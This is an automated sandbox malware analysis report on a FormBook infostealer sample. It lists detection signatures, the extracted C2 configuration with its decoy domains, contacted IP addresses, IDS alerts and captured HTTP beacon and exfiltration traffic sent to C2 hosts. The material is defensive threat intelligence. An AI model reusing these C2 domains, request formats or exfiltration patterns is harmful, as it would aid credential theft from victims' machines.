Windows Analysis Report
iuvRyl9i7D

Overview

General Information

Sample Name: iuvRyl9i7D (renamed file extension from none to exe)
Analysis ID: 626605
MD5: f7ecd12d134aaf3541396c78337ce672
SHA1: bb41a84d4f5eef537e41cf4bde375c99bff86a04
SHA256: ec2f5710fdf33c7b843829ebd9f088b15141b643b4354dd92d39b6e290ceca70
Tags: 32exetrojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsuserc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}
Multi AV Scanner detection for submitted file
Source: iuvRyl9i7D.exe Virustotal: Detection: 23% Perma Link
Source: iuvRyl9i7D.exe ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.uspplongee.com/n6g4/ Avira URL Cloud: Label: malware
Source: http://www.properscooter.com/n6g4/ Avira URL Cloud: Label: malware
Source: http://www.kickball.site/n6g4/ Avira URL Cloud: Label: phishing
Source: http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu Avira URL Cloud: Label: phishing
Source: http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe ReversingLabs: Detection: 19%
Machine Learning detection for sample
Source: iuvRyl9i7D.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: iuvRyl9i7D.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: iuvRyl9i7D.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611660
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose, 21_2_00611659
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 4x nop then pop edi 12_2_00417317
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi 21_2_00617316

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 38.34.163.59 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.209.127.155 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.properscooter.com
Source: C:\Windows\explorer.exe Domain query: www.jamesreadtanusa.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.116.236 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.uspplongee.com
Source: C:\Windows\explorer.exe Domain query: www.bldh45.xyz
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.183 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.dems-clicks.com
Source: C:\Windows\explorer.exe Domain query: www.kickball.site
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.bldh45.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.admincost.com/n6g4/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View ASN Name: INTERXSCH INTERXSCH
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 53 58 72 56 73 48 69 39 4a 75 32 4d 32 55 77 35 5f 49 63 42 61 38 6d 54 53 32 6a 70 79 6b 54 68 4a 52 79 46 66 43 32 71 4f 7a 67 6a 73 69 6b 52 30 78 44 74 46 64 39 4c 67 61 67 73 56 4b 62 73 46 37 57 50 2d 43 65 35 70 63 6c 57 36 37 62 71 47 67 6d 42 4d 7a 54 48 76 45 4b 62 6e 6e 6a 76 44 62 6f 57 74 76 6d 47 76 70 59 66 67 49 43 32 43 39 2d 77 78 44 58 4d 71 6c 72 39 77 66 37 44 72 4d 4f 59 75 69 36 62 44 74 54 30 73 59 6e 37 4a 71 6b 53 72 6d 42 47 69 65 74 63 44 53 4f 6f 4f 31 33 52 77 76 64 72 43 56 4d 30 64 55 5f 35 56 32 70 77 46 71 64 69 57 39 66 49 45 73 42 39 30 76 4b 53 55 31 35 4b 54 72 7a 4c 47 66 33 77 65 45 56 37 4a 54 6e 44 78 6e 4c 73 45 4c 4a 61 70 33 49 41 64 46 4f 5a 5a 41 78 44 63 6b 79 77 56 69 43 56 58 6c 41 49 59 39 4c 52 66 62 47 43 43 45 5f 61 71 4c 62 71 5f 38 74 65 30 6e 57 49 45 68 37 28 44 6e 2d 62 77 28 61 30 6f 5a 4b 7e 73 41 6a 42 53 45 61 38 4f 33 47 7a 35 6d 69 4a 65 47 63 59 37 45 46 61 67 28 68 7e 37 31 30 37 79 65 4c 34 4d 79 33 62 39 68 74 54 68 57 54 54 4b 79 75 33 6d 62 78 70 5f 6c 4c 78 6a 4e 4c 76 55 4f 4f 37 69 34 46 74 77 68 43 44 69 4b 37 50 69 6a 78 38 72 73 46 49 6f 68 5a 36 66 48 4e 4d 4a 5a 2d 66 62 37 38 4c 6e 68 68 54 30 37 5f 41 66 41 56 32 64 35 31 77 56 55 44 35 6e 63 4a 66 35 66 61 35 65 46 4a 59 4e 4c 4b 74 6c 64 4d 28 72 53 6c 4d 39 75 41 48 55 50 48 70 59 30 4a 32 73 55 76 39 72 42 50 77 39 46 37 32 58 39 7a 55 37 38 59 76 38 4a 44 34 61 6b 45 42 67 6b 54 5a 32 64 55 4b 49 37 49 77 34 61 79 50 79 50 50 68 4e 65 69 52 4b 51 33 61 6f 4e 47 69 37 33 33 58 45 56 30 54 5a 33 4f 54 39 57 37 7a 4a 6e 31 67 77 49 4e 39 4b 41 4a 4a 72 79 46 7e 7a 47 74 4b 6b 76 61 76 54 56 35 75 42 4a 64 43 69 67 4d 77 4d 33 44 7e 57 6c 73 58 52 53 6d 70 6f 44 31 56 34 58 57 4e 71 43 46 34 50 43 59 36 4f 7a 79 42 58 7e 66 49 4d 42 71 7a 71 31 32 52 38 72 43 6d 6a 78 4a 6d 42 46 6d 6e 4c 48 4c 49 79 59 57 48 79 4f 57 59 75 32 31 45 4f 6e 67 33 36 49 4e 72 38 75 49 73 4b 61 52 78 48 51 4b 37 4b 55 73 46 34 54 58 33 4f 38 4d 5a 30 6d 63 75 39 53 67 37 37 37 56 4e 30 36 30 35 54 45 6d 36 54 51 42 64 4f 5a 53 31 63 41 6e 6c 48 38 41 32 4a 44 38 4e 4c 58 4f 75 36 5a 42 52 4b 75 4c 68 35 69 66 43 49 4a 71 68 34 4b 76 66 71 37 4d 42 7a 69 64 4f 48 76 4e 62 65 50 33 35 53 45 55 56 64 46 46 52 5f 77 77 51 71 4d 61 54 72 30 32 52 30 69 45 53 2d 52 64 61 41 48 32 76 72 65 31 44 43 34 71 44 66 6d 67 79 6e 65 5f 58 57 39 51 35 75 56 4b 51 77 41 33 53 35 47 50 44 50 5a 34 4c 72 79 77 61 49 44 2d 74 43 42 68 71 75 72 36 6f 78 50 76 4a 68 48 37 34 74 4d 32 39 65 77 68 73 47 38 4f 48 36 28
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 5a 4e 45 5a 34 68 33 30 28 71 39 44 6e 45 76 73 72 5a 49 6e 36 41 6b 32 52 32 42 6e 4c 49 58 75 79 44 6f 78 4b 39 65 5f 67 73 78 61 49 79 58 35 58 51 65 5a 78 6f 48 66 53 49 56 46 4e 38 66 38 65 6c 57 59 74 6c 44 44 69 38 54 41 76 35 32 35 47 65 48 68 62 38 68 63 59 49 4b 72 44 35 6e 4d 32 6a 48 30 50 54 56 42 78 59 32 73 53 55 50 68 52 67 35 44 68 66 42 50 55 61 78 5a 67 31 78 5f 6c 79 37 78 7e 57 34 76 6d 52 59 5f 79 55 45 64 6a 6d 4b 63 45 46 43 6e 77 37 6d 55 71 7a 6b 6a 58 64 4c 6a 53 48 59 36 4c 61 4a 4b 4a 71 74 75 64 4d 32 77 44 64 41 34 37 33 28 54 51 62 34 43 36 4f 59 6c 35 64 46 78 65 76 4f 77 6a 71 69 33 33 32 6e 49 63 48 58 64 58 5f 49 51 6f 49 42 63 72 31 70 5f 73 73 61 47 52 4d 58 55 48 69 66 61 70 65 33 45 35 38 57 4f 6d 59 45 33 44 72 6f 57 4a 30 77 74 67 5f 64 64 54 4d 4d 41 57 69 61 7a 45 37 4d 58 37 53 77 74 48 68 71 6b 38 31 55 4b 4a 44 76 66 4e 33 47 49 46 75 4a 6e 6b 41 44 39 4a 56 76 75 4a 5f 48 45 6f 6b 47 64 69 61 54 45 28 7a 33 32 6f 75 54 54 69 66 66 44 6f 72 67 75 74 59 44 36 56 37 4d 61 4d 4c 54 44 30 53 39 76 69 4a 38 57 45 38 56 33 58 52 4f 5a 41 67 71 31 61 71 4e 44 45 44 76 32 62 72 38 44 47 43 6a 6f 62 33 57 6e 79 6d 4a 42 6f 71 6a 58 46 4e 78 47 76 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=ZNEZ4h30(q9DnEvsrZIn6Ak2R2BnLIXuyDoxK9e_gsxaIyX5XQeZxoHfSIVFN8f8elWYtlDDi8TAv525GeHhb8hcYIKrD5nM2jH0PTVBxY2sSUPhRg5DhfBPUaxZg1x_ly7x~W4vmRY_yUEdjmKcEFCnw7mUqzkjXdLjSHY6LaJKJqtudM2wDdA473(TQb4C6OYl5dFxevOwjqi332nIcHXdX_IQoIBcr1p_ssaGRMXUHifape3E58WOmYE3DroWJ0wtg_ddTMMAWiazE7MX7SwtHhqk81UKJDvfN3GIFuJnkAD9JVvuJ_HEokGdiaTE(z32ouTTiffDorgutYD6V7MaMLTD0S9viJ8WE8V3XROZAgq1aqNDEDv2br8DGCjob3WnymJBoqjXFNxGvw).
Source: global traffic HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 5a 4e 45 5a 34 6a 7a 59 79 37 51 44 72 30 69 43 71 4d 73 7a 77 51 30 30 58 47 4e 69 53 70 4c 31 31 79 34 62 58 73 75 43 75 4f 78 45 5a 32 7a 55 54 58 54 4b 78 71 76 6d 59 71 68 42 48 38 62 5f 65 68 79 6d 74 6c 48 44 6a 39 36 4c 75 65 53 66 46 39 76 69 63 63 68 4b 4b 49 4b 75 48 34 36 71 32 6a 44 47 50 54 64 76 78 74 71 73 53 33 6e 68 54 6e 46 2d 76 66 42 4e 49 4c 42 7a 6b 31 73 41 6c 79 6a 58 7e 54 51 76 6e 68 63 5f 7a 33 4d 65 68 68 7e 62 63 46 43 75 7a 4c 6d 33 68 54 6f 33 58 64 48 4e 53 47 6b 36 4c 50 52 4b 4c 36 4e 75 66 37 69 7a 61 39 41 78 77 58 28 55 55 62 31 4d 36 4f 45 70 35 5a 31 4c 65 64 53 77 6a 61 69 32 68 48 76 41 59 51 36 46 56 38 55 33 6f 49 4e 31 72 67 77 71 73 75 66 54 57 39 6e 5a 4d 6b 71 4e 70 64 62 36 30 38 57 56 74 34 46 72 44 72 6f 63 4a 30 78 4f 67 2d 4e 64 54 50 73 41 57 42 79 7a 4d 37 4d 51 75 53 77 52 4c 42 72 32 34 77 4d 30 4a 44 33 6c 4e 32 7e 59 46 61 31 6e 72 77 7a 39 65 43 37 70 51 76 48 47 73 6b 47 38 6f 36 54 42 28 7a 33 55 6f 71 47 55 6a 6f 48 44 70 36 67 75 39 4c 6e 36 58 4c 4d 61 51 37 54 37 28 79 67 79 69 49 59 53 45 39 6b 49 58 69 69 5a 44 31 7e 31 61 4c 4e 44 49 54 76 32 54 4c 39 45 4c 68 61 46 59 6c 43 76 7e 6d 45 71 68 75 43 7a 4e 64 68 4f 31 45 56 42 78 77 33 4b 36 4b 4f 34 48 54 55 33 79 44 4d 41 42 53 64 76 62 37 58 70 6e 57 7a 59 57 4d 39 38 6c 71 52 48 35 6f 4f 7a 31 42 67 2d 53 70 43 54 79 58 28 62 49 41 6c 41 7a 6d 52 75 43 51 39 74 39 41 4a 2d 73 6a 76 58 4f 4d 7e 7a 4d 34 42 6b 6e 7a 4b 7a 49 69 55 32 6b 72 30 5a 6c 6a 73 70 68 72 49 45 79 44 56 45 59 32 73 46 73 35 6e 58 6f 68 54 45 78 73 50 61 75 42 6e 70 77 5f 35 52 72 33 33 64 70 4e 34 69 42 78 39 32 4d 4f 64 43 63 67 47 42 52 4b 62 70 6c 52 41 32 46 6c 52 71 71 6f 72 51 67 72 53 51 4c 62 4c 46 70 76 69 46 34 52 76 41 76 4d 59 33 4d 4d 73 76 48 53 74 41 39 49 77 4f 6b 43 56 41 34 56 64 66 61 59 31 41 6b 4d 43 49 4d 46 4c 78 51 51 64 6a 57 67 59 58 4a 43 42 73 70 66 79 6d 53 37 47 4a 47 71 36 45 57 6f 6e 59 4e 78 44 32 76 66 41 54 6f 32 56 63 38 48 49 54 37 67 4b 2d 43 56 52 69 41 4a 75 6f 56 7a 33 62 68 37 65 55 72 37 75 76 37 66 59 43 32 47 6d 66 78 6e 5a 2d 4f 5a 77 65 7e 70 47 33 39 71 4a 70 43 5f 49 44 4d 46 4a 41 46 48 33 79 58 74 68 64 7a 7a 6c 41 35 4f 68 76 58 4f 72 74 6d 4e 6d 65 78 56 28 41 55 39 58 38 46 31 34 6e 52 33 4d 57 4a 4a 48 43 67 4c 4f 75 7e 78 4e 50 6d 4e 5a 68 6e 73 54 36 6a 55 74 6f 75 46 67 5f 7a 4a 4f 5f 61 4c 39 38 72 70 66 4a 65 72 66 2d 4e 48 6a 50 4b 75 4a 46 67 75 32 65 53 65 37 6b 33 4e 4b 4b 6a 4c 69 4e 46 35 42 6f 6a 38 54 43 4f 61 33 4f 44 51 64 70 4c 69 38 5a 7e 5f 37 44 63 79 57 36 48 52 35 74 6e
